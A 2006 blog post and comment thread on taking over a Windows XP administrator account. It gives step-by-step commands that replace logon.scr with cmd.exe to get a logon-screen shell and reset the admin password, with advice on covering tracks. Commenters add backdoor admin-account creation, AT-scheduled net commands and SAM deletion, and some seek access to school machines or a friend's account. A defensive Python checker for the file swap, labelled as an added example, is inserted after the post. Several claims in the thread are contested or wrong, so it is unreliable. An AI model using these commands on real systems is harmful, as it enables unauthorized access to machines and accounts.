How to Hack a Windows XP Admin’s Password
November 2nd, 2006 by Quinn Zerfas
This is a cool little Microsoft Windows trick I’ve picked up in my travels, and I decided to share it with you fine and ethical individuals =). Log in, go to your DOS command prompt, and enter these commands exactly:
cd\
cd\windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit
So what you just told Windows to back up is the command program and the screen saver file. Then you edited the settings so when Windows loads the screen saver, you will get an unprotected DOS prompt without logging in. When this appears enter this command that’s in parenthesis (net user password). So if the admin user name is Doug and you want the password 1234 then you would enter “net user Doug 1234” and now you’ve changed the admin password to 1234. Log in, do what you want to do, copy the contents of temphack back into system32 to cover your tracks.
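
From the defender's side, the swap described above is visible on disk: a genuine logon.scr is a GUI-subsystem PE image, while cmd.exe is a console-subsystem one. The Python check below is an added example, not part of the original post; its function names and the header stubs it runs on are constructed for illustration.

```python
import hashlib
import struct

SUBSYSTEM_GUI = 2   # IMAGE_SUBSYSTEM_WINDOWS_GUI: what a real screen saver uses
SUBSYSTEM_CUI = 3   # IMAGE_SUBSYSTEM_WINDOWS_CUI: console programs such as cmd.exe


def pe_subsystem(data: bytes):
    """Return the PE Subsystem field, or None if data is not a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    # Signature (4) + COFF header (20) + offset 68 into the optional header.
    off = e_lfanew + 4 + 20 + 68
    if len(data) < off + 2 or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    return struct.unpack_from("<H", data, off)[0]


def check_logon_scr(scr: bytes, cmd: bytes):
    """Return a list of findings for a logon.scr image compared with cmd.exe."""
    findings = []
    if hashlib.sha256(scr).digest() == hashlib.sha256(cmd).digest():
        findings.append("logon.scr is byte-identical to cmd.exe")
    sub = pe_subsystem(scr)
    if sub is None:
        findings.append("logon.scr is not a valid PE image")
    elif sub == SUBSYSTEM_CUI:
        findings.append("logon.scr is a console program, not a screen saver")
    return findings


def fake_pe(subsystem: int, tag: bytes) -> bytes:
    """Constructed sample: minimal PE header stub, not a real Windows binary."""
    buf = bytearray(0x40 + 4 + 20 + 70)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)
    buf[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<H", buf, 0x40 + 92, subsystem)
    return bytes(buf) + tag


if __name__ == "__main__":
    cmd = fake_pe(SUBSYSTEM_CUI, b"cmd")
    print(check_logon_scr(fake_pe(SUBSYSTEM_GUI, b"scr"), cmd))  # clean
    print(check_logon_scr(cmd, cmd))                              # swapped
```

On a real machine, pass the bytes read from the System32 copies of logon.scr and cmd.exe to check_logon_scr.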

Does putting the two files back restore the admin’s original password? Or will the admin not be able to log in afterwards?
hi guys…pls teach how to make windows xp not to log on after a month or two months…pls
watch this vid, it might solve your problems
http://www.metacafe.com/watch/376759/simple_way_on_how_to_hack_user_passwords_useful/
My command prompt doesn’t work anymore; I keep getting an error that says windows can not find cmd. Check the name? What’s going on? I did all that above and now nothing works. Thanks.
*JoSh*
yo, you can go to run and type in command prompt hit enter and it should open it in a different way so that won’t happen anymore
man the problem is your computer may have got a virus which first destroyed the cmd.exe file. So please first try to scan your computer with either updated F-Secure or Kaspersky new version
You can go to Notepad or open Windows Internet Explorer and right click and click source, then when one of those is open type command.com, then save the file as Anything You Want.bat, then close it and open it again for a command prompt!
Install “avira” antivirus in ur system
My command prompt doesn’t work anymore; I keep getting an error that says windows can not find cmd. Check the name? What’s going on? I did all that above and now nothing works. Thanks for the help!
*JoSh*
type “command” if “cmd” doesn’t work.
also “command.com” or “cmd.com” one of those four should work.
if it doesn’t work u can email me for help
(teecehunter@yahoo.com)
It’s because you renamed your cmd.exe to logon.scr, what you need to do is take cmd.exe and logon.scr out of the temphack folder you made and put them back into the system32 folder.
and how do u move ur temphack folder bak to ur system32 folder?
Hey but that doesn’t work bcoz my administrator deny the access even to change the name of the file …or delete the file
not working.. access denied
not working… access denied
can’t change password.. net user administrator *
without login as power user
:(
wat is DOS
Yes, you are backing up their login info, deleting and making your own to get access. Putting the temphack files back is going to restore the original information
uh.. no. First of all this is old. Second of all.. the original password WILL NOT be restored. Do you honestly think password hashes are stored in the command prompt executable or the screensaver????? Come on.. if you are going to give ‘hacking’ advice.. make sure you actually know what you’re talking about. So… where did you copy this info from?
Mike, no, restoring the files won’t restore the original password. The one you just created will still be in effect.
Quinn, you are just backing up the tools used to change the password. The “net password” actually changes the password in another part of the machine that you haven’t touched yourself.
No. You’re wrong. Once you change the local admin’s password, that’s all she wrote. Unless you know his/her password already (so you can change it back), once you change it, it’s gone from the system.
Also, this breach won’t work if the system has NTFS as the file system, unless you have administrative rights, you won’t be able to delete logon.scr
This post is full of holes.
If you want to learn about /real/ hacking, check out Binary Revolution.
No it won’t. You are replacing the screensaver (logon.scr) with a command prompt (cmd.exe). Putting the files back just puts the screensaver back the way it was, but not changing any other settings back.
The downside to this is you still need to be able to log in to move the files around :\
a slightly shorter way of doing the same thing:
cd\
cd\windows\system32
mkdir temphack
move logon.scr temphack\logon.scr
copy cmd.exe logon.scr
exit
This does not work with XP with a domain
can not move or delete logon.scr
if you have a solution to erase the admin password of my HP portable, i would be a lot grateful to you
Why don’t you just delete sam that is the easiest admin password hack.
logon.scr is a protected file, you need admin privs to delete it. IF you already have admin privs needed to do this, then you could just change the administrator password yourself.
So, this isn’t really a hack.
A hack that requires you to be logged into the machine to set up the hack isn’t a hack. If you’re already logged into the machine what do you need the hack for?
You are logged into the machine but not with administrative privileges. That’s what you need the hack for. And a brain, while you are at it.
I wrote a simpler way to do this a long time ago. If you have ANY admin access, you can just use the command to change any other user’s password without knowing it. This was all previously covered @
http://www.allthingsmarked.com/2006/08/21/change-your-xp-password-via-the-command-line/
I tried on computer in A+spec class with restricted access it doesn’t work when i tried to make directory temphack it says access denied HELP
try this http://ophcrack.sourceforge.net/. Works perfectly.
Brilliant! You just wiped the admin’s password and he’s going to be quite cross with you!
The two files you’ve copied DO NOT contain the Admin’s password which you can’t get that way.
You’d have to use something like the NTBACKUP and have it save the registry (System State). Restoring the registry, would of course wipe your hacked account.
You’re better off doing something like this instead:
net user i0wnU SkR1ptK!ddY /add
net localgroup Administrators i0wnU /add
This won’t add you to the domain, but will add you to the local machine.
Also, you’ll find that on a properly hardened system, you will not have permissions to overwrite the screensaver.
However, if you are allowed to run the windows scheduler via the AT command, you can schedule the above net commands to do the same thing without messing about with the screen saver. (Provided the scheduler runs as the SYSTEM or an Admin)
i.e.
AT 06:06 NET USER ….
AT 06:07 NET LOCALGROUP …
And Bob’s your uncle.
Cheers!
Wouldn’t you have to already have administrator privileges in order for this to work? I wouldn’t think a user that was only in the Users group would have permissions to overwrite those files on an NTFS filesystem. Perhaps the filesystem is FAT32?
Ever heard of ERD commander?…. that would be much easier if you can’t get into the comp to begin with due to a lock out …
Hello I see that you had offered some advice to someone back in 2006 about my loERD commander I have the software. Well, what my problem is. I have a hard drive that I am trying to access but it is protected with a BIOS password. How can I get around it with the locksmith or can you tell me what script I should be looking for in command line once opened in notepad so I can change the value of 0 or 1 I don’t want to overwrite the hard drive. Any feedback would be greatly appreciated.
Thanks in advance!!!
Normal system user does not have rights to copy, move, ren files in sys32. So useless unless you have rights to the C:.
This only works in Windows 2000 and prior. Does not work in XP/2003. You must have Admin rights to modify files/folders in %SYSTEMROOT%\System32 directory in XP/2003.
Anyway, once you have physical access to machine use: http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html
It’s a nice idea if you stick this on a USB stick and were scouring the school/office for unlocked, unattended PCs. As mentioned there are many better ways, but certainly this line would expose you straight away:
rename cmd.exe logon.scr
In effect you’ve moved cmd.exe meaning nobody on the machine can open a command prompt. Oops.
hello
i want to know how hack software and how have login
I don’t even know English so good, but I can tell you guyz that nothing of what you wrote works !!!
It works just if you are logged in with administrator account and you want to hack yourself … hahaha pretty smart
neither the cd which changes the users passwords work
’cause may be the stupid admin set a password on the BIOS,
so you can’t make it boot, and probably you don’t want him to see you breaking apart his notebook pc to pull out the battery
for 1 min.
notice that the most competent administrators are securing very well, so you don’t have access to wherever the OS is installed, you can’t make,del,rename folders and shi*,kill tasks..
you don’t even see that..
Although the shi* you are talking about just does not work very well.
I hope next time I visit you’ll come up with something better…
MLADUSER
Nope. This does work on Windows XP (Most of the time). Some computers deny access while others do not. Luckily, our school’s computers all have DeepFreeze so all I need to do to remove traces is to restart the computer.
Now, to turn this into a useful function quickly (lost admin password.. mistyped admin password, admin is AWOL) you could boot a nice Linux kernel, mount NTFS, and make the quick file change(s) that would then allow you to assign a new admin password.
I’ve never attempted to do this, but am going to file it away as a quick way to clean up a bad problem. I have had to pull a file from a PC and send it somewhere to have them hack the SAM file.
My XP-Pro is in a domain, and the Linux-life cd does not find the harddisk !
If you are logged in as an administrator the easiest way to change any password, including THE administrator, is simply to run ‘control userpasswords2’ (without quotes) from a command prompt, then change at will.
If I can’t even get into the beast as an administrator I use a linux bootdisk which allows me to reset any password. If there’s another way I’d be delighted to learn it here.
I tried many of the above options on my XP Pro version with Novell and yours worked great. I entered the ‘control userpasswords2’ command and was able to change the administrator password. Working for a school this is great for all the donated computers we get. Thank you!
Just restart the friggin machine and press f8 to log in under safe mode with networking. Then log in under the administrator which is usually password-free. Create your own username and then restart with admin privileges. Do whatever u want then restart with f8 safemode, go under administrator and delete the account u made!!!! wtf!!
or use this service– http://www.loginrecovery.com
This does not work with XP in a domain
if you have a better solution,
i will be grateful to hear about
actually there is a way to do this without logging in. you could use a windows 2000 installation disk and boot into the repair console to run the commands. while it is a windows 2000 disk, you can still use it to log into an xp installation. also a repair console from a windows xp disk will ask you for the administrator password whereas a win2k disk will not.
-cheers!
On our school computers, we have XP, but on the accounts that we log into are not the administrator accounts, so, they’ve locked us out of the Dos/Command prompt - Since we cannot access the command prompt, how can we bypass that?
you can create a batch file and have it say
” call c:\windows\system32\command”
ok so this a pretty dumb question.. but the slashes r reverse and i really cant find it.. how do i type that in?
And on a side note - Logging into safemode period - the admins have disabled the “add a new user” thing - so therefore, I don’t think we can create a new user.
This will not work on XP (SP2 at least). The SYSTEM account no longer has the required access as it once had. Microsoft closed this hole. SYSTEM runs at a user level so when you try this hack you should receive SYSTEM ERROR 5 access denied or something to that effect.
Use the bootable Linux Offline password editor to “blank” the admin password. Works every time, doesn’t require admin access, doesn’t require you to know the local admin name and is safe to use. I’ve used it multiple times for legit reasons when we needed to access laptops and desktops where the local admin wasn’t known or the account had been locked out. Hint: if you use this tool just change the local admin password to blank and don’t try setting one.
Enjoy…
This does not work on my HP portable with XP-Pro with a domain
Linux can not find the HDD
the same occurs when i use a XP-cd to reinstall: no harddisk found
the reason why ur windows xp shows hard disk not found is bcos of the corruption of ur win xp.
so first go to boot screen and then change the hard disk mode to ide enabled
Any windows user worth their salt will be using NTFS and will have encrypted any security sensitive files.
Resetting the Admin password may allow access to NTFS but not encrypted files. For this the public and user keys are required.
Now a hack that allowed the Admin account password to be hacked whilst allowing permission securities to remain in place would be worth writing about!
Come on guys. You use the old ways. I use a USB flash or CD boot drive to bypass anything MS can secure. This boot drive uses its own operating system against it allowing me to write to the SAM as an unprotected file without corruption. Most newer mobo BIOS support booting from an alternate source without entering the BIOS. I can even fix bad boot records, copy any files I want, delete any files I want. So get with the program.
goto run. and type cmd
command prompt appears.
type, net user
then type, net user adminis name *
password change option will come
change it and u have hacked xp
hae wen u do this the password option does not come up so therefore cannot change password.
my dad is the administrator and the only one with administrative rights but he used a password that he hadn’t used before that only he knew and now he can’t remember it. is there anything i can do to change his password
Thanks
OK, so we seem to have established that we can use Linux to blank or change the Administrator password (but thereby lose access to any encrypted files owned by the Administrator, until the password is changed back to its original setting) - Or we can change the Administrator password so long as we are logged into another account with administrator privileges. How can we find out the Administrator password without resetting it or having administrator privileges?
i wanna have my friend’s pass
i want to hack a friend’s password
Guys we are not getting the answer, how do we hack the Local Admin password or else how do we give ourselves local admin right? Without knowing existing Admin password
Thanks for the tip